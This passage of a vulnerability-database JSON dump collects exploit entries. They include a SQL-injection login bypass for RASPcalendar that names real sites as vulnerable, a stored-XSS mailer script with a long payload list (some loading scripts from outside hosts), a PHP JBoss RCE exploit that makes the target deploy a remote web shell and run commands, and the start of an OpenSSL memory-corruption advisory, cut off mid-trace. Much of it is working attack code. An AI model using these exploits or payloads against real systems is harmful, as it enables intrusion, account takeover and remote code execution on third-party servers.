\"\\n \")) end}\n if check then\n if tableaux.contains(domains, \"*\") or tableaux.contains(domains, \"https://\") or tableaux.contains(domains, \"http://\") then\n vuln.state = vulns.STATE.VULN\n else\n vuln.state = vulns.STATE.LIKELY_VULN\n end\n for i, _ in pairs(content) do\n setmetatable(content[i], mt)\n tostring(content[i])\n end\n vuln.check_results = content\n vuln.extra_info = string.format(\"Trusted domains:%s\\n\", table.concat(domains, ', '))\n if not(lookup) and nmap.verbosity()>=2 then\n vuln.extra_info = vuln.extra_info .. \"Use the script argument 'domain-lookup' to find trusted domains available for purchase\"\n end\n if lookup ~= nil and #domains_available>0 then\n vuln.state = vulns.STATE.EXPLOIT\n vuln.extra_info = vuln.extra_info .. string.format(\"[!]Trusted domains available for purchase:%s\", table.concat(domains_available, ', '))\n end\n\n end\n\n return vuln_report:make_output(vuln)\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2017-11-19T14:14:57", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-83001", "id": "SSV:83001", "title": "RASPcalendar 1.01 - [ASP] Admin Login Vlunerabilities", "type": "seebug", "sourceData": "\n ---------------------------------------------------\r\nRASPcalendar 1.01 [ASP] Admin Login Vlunerabilities\r\n---------------------------------------------------\r\nAuthor : Hackeri-AL\r\nDate : 06-11-2013\r\nVendor Homepage : http://www.rttucson.com/files.html\r\nSoftware link : http://www.rttucson.com/RASPcalendar.zip\r\nVerison : 1.01\r\nTested On : Windows XP\r\n------------------------------------------------------------\r\n\r\nGoogle Dork: allinurl:RASPcalendar "powered by RASPcalendar"\r\n\r\n------------------------------------------------------------\r\n\r\nExample : http://www.usfim.it/RASPcalendar/\r\n : http://site.com/events\r\n : http://site.com/calendar\r\n : etc...\r\n\r\nGo to : http://www.usfim.it/RASPcalendar/admin/\r\n\r\nUserName : 1'or'1\r\nPassWord : 1'or'1\r\n\r\nLogin Success Fully :D\r\n\r\n------------------------------------------------------------\r\n\r\nVuln sites demo :\r\n\r\nhttp://www.usfim.it/RASPcalendar/admin\r\nhttp://www.davemitchellassociates.com/events/admin\r\nhttp://www.bradandrebecca.com/Calendar/admin\r\nhttp://www.hlubline.com/pt/calendar/admin\r\n\r\n------------------------------------------------------------\r\n\r\nFound By Hackeri-AL , UAH-Crew Group 2009-2013\r\n\r\nUNITED ALBANIAN HACKERS , Thnx to LoocK3D & b4cKd00r ~\r\n\r\n[~] Legends Of Albania\r\n\r\n------------------------------------------------------------\n ", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-83001"}, {"lastseen": "2017-11-19T17:15:27", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-81397", "id": "SSV:81397", "title": "dreamMail e-mail client 4.6.9.2 - Stored XSS", "type": "seebug", "sourceData": "\n #!/usr/bin/python\r\n'''\r\n\r\nAuthor: loneferret of Offensive Security\r\nProduct: dreamMail e-mail client\r\nVersion: 4.6.9.2\r\nVendor Site: http://www.dreammail.eu\r\nSoftware Download: http://www.dreammail.eu/intl/en/download.html\r\n\r\nTested on: Windows XP SP3 Eng.\r\nTested on: Windows 7 Pro SP1 Eng.\r\ndreamMail: Using default settings\r\n\r\n\r\nE-mail client is vulnerable to stored XSS. Either opening or viewing the e-mail and you \r\nget an annoying alert box etc etc etc.\r\nInjection Point: Body\r\n \r\nGave vendor 7 days to reply in order to co-ordinate a release date. \r\nTimeline:\r\n16 Aug 2013: Tentative release date 23 Aug 2013\r\n16 Aug 2013: Vulnerability reported to vendor. Provided complete list of payloads.\r\n19 Aug 2013: Still no response. Sent second e-mail.\r\n22 Aug 2013: Got a reply but not from development guy. He seems MIA according to contact.\r\n No longer supported due to missing development guy. \r\n23 Aug 2013: Still nothing.\r\n24 Aug 2013: Release\r\n\r\n'''\r\n\r\nimport smtplib, urllib2\r\n\r\npayload = '''<IMG SRC='vbscript:msgbox("XSS")'>'''\r\n\r\ndef sendMail(dstemail, frmemail, smtpsrv, username, password):\r\n msg = "From: hacker@offsec.local\\n"\r\n msg += "To: victim@offsec.local\\n"\r\n msg += 'Date: Today\\r\\n'\r\n msg += "Subject: XSS payload\\n"\r\n msg += "Content-type: text/html\\n\\n"\r\n msg += payload + "\\r\\n\\r\\n"\r\n server = smtplib.SMTP(smtpsrv)\r\n server.login(username,password)\r\n try:\r\n server.sendmail(frmemail, dstemail, msg)\r\n except Exception, e:\r\n print "[-] Failed to send email:"\r\n print "[*] " + str(e)\r\n server.quit()\r\n\r\nusername = "acker@offsec.local"\r\npassword = "123456"\r\ndstemail = "victim@offsec.local"\r\nfrmemail = "acker@offsec.local"\r\nsmtpsrv = "xxx.xxx.xxx.xxx"\r\n\r\nprint "[*] Sending Email"\r\nsendMail(dstemail, frmemail, smtpsrv, username, password)\r\n\r\n'''\r\nList of XSS types and different syntaxes to which the client is vulnerable.\r\nEach payload will pop a message box, usually with the message "XSS" inside.\r\n\r\n\r\nPaylaod-: ';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}\r\n\r\nPaylaod-: <SCRIPT SRC=http://server/xss.js></SCRIPT>\r\n\r\nPaylaod-: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\r\n\r\nPaylaod-: <BODY BACKGROUND="javascript:alert('XSS');">\r\n\r\nPaylaod-: <BODY ONLOAD=alert('XSS')>\r\n\r\nPaylaod-: <DIV STYLE="background-image: url(javascript:alert('XSS'))">\r\n\r\nPaylaod-: <DIV STYLE="background-image: url(javascript:alert('XSS'))">\r\n\r\nPaylaod-: <DIV STYLE="width: expression(alert('XSS'));">\r\n\r\nPaylaod-: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>\r\n\r\nPaylaod-: <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">\r\n\r\nPaylaod-: <IMG SRC="javascript:alert('XSS');">\r\n\r\nPaylaod-: <IMG SRC=javascript:alert('XSS')>\r\n\r\nPaylaod-: <IMG DYNSRC="javascript:alert('XSS');">\r\n\r\nPaylaod-: <IMG LOWSRC="javascript:alert('XSS');">Paylaod-: 21exp/*<XSS STYLE='no\\xss:noxss("*//*");\r\nxss:ex/*XSS*//*/*/pression(alert("XSS"))'>\r\n\r\nPaylaod-: <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS\r\n\r\nPaylaod-: <IMG SRC='vbscript:msgbox("XSS")'>\r\n\r\nPaylaod-: <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>\r\n\r\nPaylaod-: <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">\r\n\r\nPaylaod-: <XSS STYLE="xss:expression(alert('XSS'))">\r\n\r\nPaylaod-: <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>\r\n\r\nPaylaod-: <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>\r\n\r\nPaylaod-: <LINK REL="stylesheet" HREF="javascript:alert('XSS');">\r\n\r\nPaylaod-: <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">\r\n\r\nPaylaod-: <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>\r\n\r\nPaylaod-: <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>\r\n\r\nPaylaod-: <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>\r\n\r\nPaylaod-: <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>\r\n</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>\r\n\r\nPaylaod-: <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>\r\n<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\r\n\r\nPaylaod-: <HTML><BODY>\r\n<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">\r\n<?import namespace="t" implementation="#default#time2">\r\n<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>\r\n\r\nPaylaod-: <!--[if gte IE 4]>\r\n<SCRIPT>alert('XSS');</SCRIPT>\r\n<![endif]-->\r\n\r\nPaylaod-: <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>\r\n\r\nPaylaod-: <IMG SRC=JaVaScRiPt:alert('XSS')>\r\n\r\nPaylaod-: <IMG SRC=javascript:alert("XSS")>\r\n\r\nPaylaod-: <IMG SRC=`javascript:alert("We says, 'XSS'")`>\r\n\r\nPaylaod-: <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\r\n\r\nPaylaod-: <IMG SRC=javascript:alert('XSS')>\r\n\r\nPaylaod-: <IMG SRC=javascript:alert('XSS')>\r\n\r\nPaylaod-: <IMG SRC=javascript:alert('XSS')>\r\n\r\nPaylaod-: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-\r\n\r\nPaylaod-: </TITLE><SCRIPT>alert("XSS");</SCRIPT>\r\n\r\nPaylaod-: <STYLE>@im\\port'\\ja\\vasc\\ript:alert("XSS")';</STYLE>\r\n\r\nPaylaod-: <IMG SRC="jav\tascript:alert('XSS');">\r\n\r\nPaylaod-: <IMG SRC="jav	ascript:alert('XSS');">\r\n\r\nPaylaod-: <IMG SRC="jav
ascript:alert('XSS');">\r\n\r\nPaylaod-: <IMG SRC="jav
ascript:alert('XSS');">\r\n\r\nPaylaod-: <IMG SRC="  javascript:alert('XSS');">\r\n\r\nPaylaod-: <SCRIPT/XSS SRC="http://server/xss.js"></SCRIPT>\r\n\r\nPaylaod-: <SCRIPT SRC=http://server/xss.js\r\n\r\nPaylaod-: <IMG SRC="javascript:alert('XSS')"\r\n\r\nPaylaod-: <<SCRIPT>alert("XSS");//<</SCRIPT>\r\n\r\nPaylaod-: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">\r\n\r\nPaylaod-: <SCRIPT>a=/XSS/\r\nalert(a.source)</SCRIPT>\r\n\r\nPaylaod-: <SCRIPT a=">" SRC="http://server/xss.js"></SCRIPT>\r\n\r\nPaylaod-: <SCRIPT ="blah" SRC="http://server/xss.js"></SCRIPT>\r\n\r\nPaylaod-: <SCRIPT a="blah" '' SRC="http://server/xss.js"></SCRIPT>\r\n\r\nPaylaod-: <SCRIPT "a='>'" SRC="http://server/xss.js"></SCRIPT>\r\n\r\nPaylaod-: <SCRIPT a=`>` SRC="http://server/xss.js"></SCRIPT>\r\n\r\nPaylaod-: <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://server/xss.js"></SCRIPT>\r\n\r\nPaylaod-: <SCRIPT a=">'>" SRC="http://server/xss.js"></SCRIPT>\r\n\r\n'''\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\n ", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-81397"}, {"lastseen": "2017-11-19T16:33:25", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-83652", "id": "SSV:83652", "title": "EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet RCE", "type": "seebug", "sourceData": "\n EMC Data Protection Advisor DPA Illuminator EJBInvokerServlet Remote Code Execution\r\n\r\ntested against: Microsoft Windows Server 2008 r2 sp1\r\n EMC Data Protection Advisor 5.8 sp5\r\n\r\nvulnerability:\r\nthe "DPA Illuminator" service (DPA_Illuminator.exe) listening\r\non public port 8090 (tcp/http) and 8453 (tcp/https) is vulnerable.\r\nIt exposes the following servlet:\r\n\r\nhttp://[host]:8090/invoker/EJBInvokerServlet\r\nhttps://[host]:8453//invoker/EJBInvokerServlet\r\n\r\ndue to a bundled invoker.war\r\nThe result is remote code execution with NT AUTHORITY\\SYSTEM\r\nprivileges.\r\n\r\nproof of concept url:\r\nhttp://retrogod.altervista.org/9sg_ejb.html\r\nhttp://www.exploit-db.com/sploits/30211.tgz\r\n\r\n~rgod~\r\n\r\n<?php\r\n/*\r\nApache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object \r\nRemote Code Execution\r\n\r\ngoogle dork: inurl:status EJBInvokerServlet \r\n\r\nthis was used successfully on Windows during a penetration test against\r\nMcAfee Web Reporter 5.2.1 (tcp port 9111/http) gaining administrative privileges\r\nsee: http://www.mcafee.com/it/downloads/downloads.aspx\r\nfile tested: webreporter64bit.zip\r\n\r\nUsage:\r\nC:\\PHP>php 9sg_ejb.php 192.168.0.1 id\r\n\r\nHTTP/1.1 200 OK\r\nServer: Apache-Coyote/1.1\r\nX-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=2006101\r\n62339)/Tomcat-5.5\r\nSet-Cookie: JSESSIONID=E9EEE1D6AD27D64ED3835C1092C4FC29; Path=/\r\nContent-Type: text/html;charset=ISO-8859-1\r\nContent-Length: 43\r\nDate: Fri, 04 Oct 2013 07:25:48 GMT\r\nConnection: close\r\n\r\n\r\nuid=0(root) gid=0(root) groups=0(root)\r\n\r\nC:\\PHP>\r\n\r\n~ rgod ~\r\n*/\r\n\r\n$host=$argv[1];\r\n$cmd=$argv[2];\r\n//$port=9111; //mcafee\r\n$port=80;\r\n\r\n//small jsp shell\r\n//change this if you want, url to the app to be deployed, keep it short\r\n$url="http://retrogod.altervista.org/a.war?"; \r\n\r\n\r\n$url_len=pack("n",strlen($url));\r\n\r\nfunction hex_dump($data, $newline="\\n") { \r\nstatic $from = ''; \r\nstatic $to = ''; \r\nstatic $width = 16; static $pad = '.'; \r\n if ($from==='') { \r\n for ($i=0; $i<=0xFF; $i++) { \r\n $from .= chr($i); \r\n $to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad; \r\n } \r\n } \r\n$hex = str_split(bin2hex($data), $width*2); \r\n$chars = str_split(strtr($data, $from, $to), $width); \r\n$offset = 0; \r\nforeach ($hex as $i => $line) { \r\n echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . ']' . $newline; \r\n $offset += $width; \r\n } \r\n} \r\n\r\n$frag_i=\r\n"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x29\\x6f\\x72\\x67\\x2e\\x6a\\x62\\x6f\\x73". // ....sr.) org.jbos\r\n"\\x73\\x2e\\x69\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x4d\\x61\\x72". // s.invoca tion.Mar\r\n"\\x73\\x68\\x61\\x6c\\x6c\\x65\\x64\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f". // shalledI nvocatio\r\n"\\x6e\\xf6\\x06\\x95\\x27\\x41\\x3e\\xa4\\xbe\\x0c\\x00\\x00\\x78\\x70\\x70\\x77". // n...'A>. ....xppw\r\n"\\x08\\x78\\x94\\x98\\x47\\xc1\\xd0\\x53\\x87\\x73\\x72\\x00\\x11\\x6a\\x61\\x76". // .x..G..S .sr..jav\r\n"\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2". // a.lang.I nteger..\r\n"\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75". // .....8.. .I..valu\r\n"\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e". // exr..jav a.lang.N\r\n"\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00". // umber... ........\r\n"\\x78\\x70\\x26\\x95\\xbe\\x0a\\x73\\x72\\x00\\x24\\x6f\\x72\\x67\\x2e\\x6a\\x62". // xp&...sr .$org.jb\r\n"\\x6f\\x73\\x73\\x2e\\x69\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x4d". // oss.invo cation.M\r\n"\\x61\\x72\\x73\\x68\\x61\\x6c\\x6c\\x65\\x64\\x56\\x61\\x6c\\x75\\x65\\xea\\xcc". // arshalle dValue..\r\n"\\xe0\\xd1\\xf4\\x4a\\xd0\\x99\\x0c\\x00\\x00\\x78\\x70\\x77";\r\n\r\n$frag_ii="\\x00";\r\n\r\n$frag_iii=\r\n"\\xac\\xed\\x00\\x05\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e". // .....ur. .[Ljava.\r\n"\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f". // lang.Obj ect;..X.\r\n"\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x04\\x73\\x72\\x00". // .s)l...x p....sr.\r\n"\\x1b\\x6a\\x61\\x76\\x61\\x78\\x2e\\x6d\\x61\\x6e\\x61\\x67\\x65\\x6d\\x65\\x6e". // .javax.m anagemen\r\n"\\x74\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x4e\\x61\\x6d\\x65\\x0f\\x03\\xa7\\x1b". // t.Object Name....\r\n"\\xeb\\x6d\\x15\\xcf\\x03\\x00\\x00\\x78\\x70\\x74\\x00\\x21\\x6a\\x62\\x6f\\x73". // .m.....x pt.!jbos\r\n"\\x73\\x2e\\x73\\x79\\x73\\x74\\x65\\x6d\\x3a\\x73\\x65\\x72\\x76\\x69\\x63\\x65". // s.system :service\r\n"\\x3d\\x4d\\x61\\x69\\x6e\\x44\\x65\\x70\\x6c\\x6f\\x79\\x65\\x72\\x78\\x74\\x00". // =MainDep loyerxt.\r\n"\\x06\\x64\\x65\\x70\\x6c\\x6f\\x79\\x75\\x71\\x00\\x7e\\x00\\x00\\x00\\x00\\x00". // .deployu q.~.....\r\n"\\x01\\x74".\r\n$url_len.\r\n$url.\r\n"\\x75\\x72\\x00".\r\n"\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61". // ur..[ Ljava.la\r\n"\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d". // ng.Strin g;..V...\r\n"\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x10\\x6a\\x61". // {G...xp. ...t..ja\r\n"\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67";\r\n\r\n$frag_iv=\r\n"\\x0d\\xd3". \r\n"\\xbe\\xc9\\x78\\x77\\x04\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x22\\x6f\\x72\\x67". // ..xw.... .sr."org\r\n"\\x2e\\x6a\\x62\\x6f\\x73\\x73\\x2e\\x69\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f". // .jboss.i nvocatio\r\n"\\x6e\\x2e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x4b\\x65\\x79\\xb8". // n.Invoca tionKey.\r\n"\\xfb\\x72\\x84\\xd7\\x93\\x85\\xf9\\x02\\x00\\x01\\x49\\x00\\x07\\x6f\\x72\\x64". // .r...... ..I..ord\r\n"\\x69\\x6e\\x61\\x6c\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x71\\x00\\x7e\\x00\\x05". // inalxp.. ..sq.~..\r\n"\\x77\\x0d\\x00\\x00\\x00\\x05\\xac\\xed\\x00\\x05\\x70\\xfb\\x57\\xa7\\xaa\\x78". // w....... ..p.W..x\r\n"\\x77\\x04\\x00\\x00\\x00\\x03\\x73\\x71\\x00\\x7e\\x00\\x07\\x00\\x00\\x00\\x04". // w.....sq .~......\r\n"\\x73\\x72\\x00\\x23\\x6f\\x72\\x67\\x2e\\x6a\\x62\\x6f\\x73\\x73\\x2e\\x69\\x6e". // sr.#org. jboss.in\r\n"\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74". // vocation .Invocat\r\n"\\x69\\x6f\\x6e\\x54\\x79\\x70\\x65\\x59\\xa7\\x3a\\x1c\\xa5\\x2b\\x7c\\xbf\\x02". // ionTypeY .:..+|..\r\n"\\x00\\x01\\x49\\x00\\x07\\x6f\\x72\\x64\\x69\\x6e\\x61\\x6c\\x78\\x70\\x00\\x00". // ..I..ord inalxp..\r\n"\\x00\\x01\\x73\\x71\\x00\\x7e\\x00\\x07\\x00\\x00\\x00\\x0a\\x70\\x74\\x00\\x0f". // ..sq.~.. ....pt..\r\n"\\x4a\\x4d\\x58\\x5f\\x4f\\x42\\x4a\\x45\\x43\\x54\\x5f\\x4e\\x41\\x4d\\x45\\x73". // JMX_OBJE CT_NAMEs\r\n"\\x72\\x00\\x1b\\x6a\\x61\\x76\\x61\\x78\\x2e\\x6d\\x61\\x6e\\x61\\x67\\x65\\x6d". // r..javax .managem\r\n"\\x65\\x6e\\x74\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x4e\\x61\\x6d\\x65\\x0f\\x03". // ent.Obje ctName..\r\n"\\xa7\\x1b\\xeb\\x6d\\x15\\xcf\\x03\\x00\\x00\\x78\\x70\\x74\\x00\\x21\\x6a\\x62". // ...m.... .xpt.!jb\r\n"\\x6f\\x73\\x73\\x2e\\x73\\x79\\x73\\x74\\x65\\x6d\\x3a\\x73\\x65\\x72\\x76\\x69". // oss.syst em:servi\r\n"\\x63\\x65\\x3d\\x4d\\x61\\x69\\x6e\\x44\\x65\\x70\\x6c\\x6f\\x79\\x65\\x72\\x78". // ce=MainD eployerx\r\n"\\x78"; // x\r\n\r\n$data=$frag_i.pack("v",strlen($frag_iii)+8).$frag_ii.pack("n",strlen($frag_iii)).$frag_iii.$frag_iv;\r\n\r\n//$pk=""POST /invoker/JMXInvokerServlet/ HTTP/1.1\\r\\n". //the same ...\r\n\r\n$pk="POST /invoker/EJBInvokerServlet/ HTTP/1.1\\r\\n".\r\n "ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation\\r\\n".\r\n "Accept-Encoding: x-gzip,x-deflate,gzip,deflate\\r\\n".\r\n "User-Agent: Java/1.6.0_21\\r\\n".\r\n "Host: ".$host.":".$port."\\r\\n".\r\n "Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\\r\\n".\r\n "Connection: keep-alive\\r\\n".\r\n "Content-type: application/x-www-form-urlencoded\\r\\n".\r\n "Content-Length: ".strlen($data)."\\r\\n\\r\\n".\r\n $data;\r\necho hex_dump($pk)."\\n";\r\n$fp=fsockopen($host,$port,$e,$err,3);\r\nfputs($fp,$pk);\r\n$out=fread($fp,8192);\r\nfclose($fp);\r\necho hex_dump($out)."\\n";\r\n\r\nsleep(5);\r\n\r\n$pk="GET /a/pwn.jsp?cmd=".urlencode($cmd)." HTTP/1.0\\r\\n".\r\n "Host: ".$host.":".$port."\\r\\n".\r\n "Connection: Close\\r\\n\\r\\n";\r\n\r\necho hex_dump($pk)."\\n";\r\n$fp=fsockopen($host,$port,$e,$err,3);\r\nfputs($fp,$pk);\r\n$out="";\r\nwhile (!feof($fp)) {\r\n$out.=fread($fp,8192);\r\n}\r\nfclose($fp);\r\necho $out;\r\n?>\r\n\n ", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-83652"}, {"lastseen": "2017-11-19T14:50:34", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72797", "id": "SSV:72797", "title": "OpenSSL ASN1 BIO Memory Corruption Vulnerability", "type": "seebug", "sourceData": "\n Incorrect integer conversions in OpenSSL can result in memory corruption.\r\n--------------------------------------------------------------------------\r\n\r\nCVE-2012-2110\r\n\r\nThis advisory is intended for system administrators and developers exposing\r\nOpenSSL in production systems to untrusted data.\r\n\r\nasn1_d2i_read_bio in OpenSSL contains multiple integer errors that can cause\r\nmemory corruption when parsing encoded ASN.1 data. This error can be exploited\r\non systems that parse untrusted data, such as X.509 certificates or RSA public\r\nkeys.\r\n\r\nThe following context structure from asn1.h is used to record the current state\r\nof the decoder:\r\n\r\ntypedef struct asn1_const_ctx_st\r\n{\r\n const unsigned char *p;/* work char pointer */\r\n int eos; /* end of sequence read for indefinite encoding */\r\n int error; /* error code to use when returning an error */\r\n int inf; /* constructed if 0x20, indefinite is 0x21 */\r\n int tag; /* tag from last 'get object' */\r\n int xclass; /* class from last 'get object' */\r\n long slen; /* length of last 'get object' */\r\n const unsigned char *max; /* largest value of p allowed */\r\n const unsigned char *q;/* temporary variable */\r\n const unsigned char **pp;/* variable */\r\n int line; /* used in error processing */\r\n} ASN1_const_CTX;\r\n\r\nThese members are populated via calls to ASN1_get_object and asn1_get_length\r\nwhich have the following prototypes\r\n\r\nint ASN1_get_object(const unsigned char **pp,\r\n long *plength,\r\n int *ptag,\r\n int *pclass,\r\n long omax);\r\n\r\nint asn1_get_length(const unsigned char **pp,\r\n int *inf,\r\n long *rl,\r\n int max);\r\n\r\nThe lengths are always stored as signed longs, however, asn1_d2i_read_bio\r\ncasts ASN1_const_CTX->slen to a signed int in multiple locations. This\r\ntruncation can result in numerous conversion problems.\r\n\r\nThe most visible example on x64 is this cast incorrectly interpreting the\r\nresult of asn1_get_length.\r\n\r\n222 /* suck in c.slen bytes of data */\r\n223 want=(int)c.slen;\r\n\r\nA simple way to demonstrate this is to prepare a DER certificate that contains\r\na length with the 31st bit set, like so\r\n\r\n$ dumpasn1 testcase.crt\r\n0 NDEF: [PRIVATE 3] {\r\n 2 2147483648: [1]\r\n ...\r\n }\r\n\r\nBreakpoint 2, asn1_d2i_read_bio (in=0x9173a0, pb=0x7fffffffd8f0) at a_d2i_fp.c:224\r\n224 if (want > (len-off))\r\n(gdb) list\r\n219 }\r\n220 else\r\n221 {\r\n222 /* suck in c.slen bytes of data */\r\n223 want=(int)c.slen;\r\n224 if (want > (len-off))\r\n225 {\r\n226 want-=(len-off);\r\n227 if (!BUF_MEM_grow_clean(b,len+want))\r\n228 {\r\n(gdb) p c.slen\r\n$18 = 2147483648\r\n(gdb) p want\r\n$19 = -2147483648\r\n\r\nThis results in an inconsistent state, and will lead to memory corruption.\r\n\r\n--------------------\r\nAffected Software\r\n------------------------\r\n\r\nAll versions of OpenSSL on all platforms up to and including version 1.0.1 are\r\naffected.\r\n\r\nSome attack vectors require an I32LP64 architecture, others do not.\r\n\r\n--------------------\r\nConsequences\r\n-----------------------\r\n\r\nIn order to explore the subtle problems caused by this, an unrelated bug in the\r\nOpenSSL allocator wrappers must be discussed.\r\n\r\nIt is generally expected that the realloc standard library routine should support\r\nreducing the size of a buffer, as well as increasing it. As ISO C99 states "The\r\nrealloc function deallocates the old object pointed to by ptr and returns a\r\npointer to a new object that has the size speci?ed by size. The contents of the\r\nnew object shall be the same as that of the old object prior to deallocation,\r\nup to the lesser of the new and old sizes."\r\n\r\nHowever, the wrapper routines from OpenSSL do not support shrinking a buffer,\r\ndue to this code:\r\n\r\nvoid *CRYPTO_realloc_clean(void *str, int old_len, int num, const char *file, int line)\r\n{\r\n /* ... */\r\n ret=malloc_ex_func(num,file,line);\r\n if(ret)\r\n {\r\n memcpy(ret,str,old_len);\r\n OPENSSL_cleanse(str,old_len);\r\n free_func(str);\r\n }\r\n /* ... */\r\n return ret;\r\n}\r\n\r\nThe old data is always copied over, regardless of whether the new size will be\r\nenough. This allows us to turn this truncation into what is effectively:\r\n\r\n memcpy(heap_buffer, <attacker controlled buffer>, <attacker controlled size>);\r\n\r\nWe can reach this code by simply causing an integer to be sign extended and\r\ntruncated multiple times. These two protoypes are relevant:\r\n\r\nint BUF_MEM_grow_clean(BUF_MEM *str, size_t len);\r\n\r\nvoid *CRYPTO_realloc_clean(void *str, int old_len, int num, const char *file, int line);\r\n\r\nBUF_MEM_grow_clean accepts a size_t, but the subroutine it uses to handle the\r\nallocation only accepts a 32bit signed integer. We can exploit this by\r\nproviding a large amount of data to OpenSSL, and causing the length calculation\r\nhere to become negative:\r\n\r\n /* suck in c.slen bytes of data */\r\n want=(int)c.slen;\r\n if (want > (len-off))\r\n {\r\n want-=(len-off);\r\n if (!BUF_MEM_grow_clean(b,len+want))\r\n {\r\n ASN1err(ASN1_F_ASN1_D2I_READ_BIO,ERR_R_MALLOC_FAILURE);\r\n goto err;\r\n }\r\n\r\nBecause want is a signed int, the sign extension to size_t for\r\nBUF_MEM_grow_clean means an unexpectedly size_t is produced. An\r\nexample is probably helpful:\r\n\r\n(gdb) bt\r\n#0 asn1_d2i_read_bio (in=0x9173a0, pb=0x7fffffffd8f0) at a_d2i_fp.c:223\r\n#1 0x0000000000524ce8 in ASN1_item_d2i_bio (it=0x62d740, in=0x9173a0, x=0x0) at a_d2i_fp.c:112\r\n#2 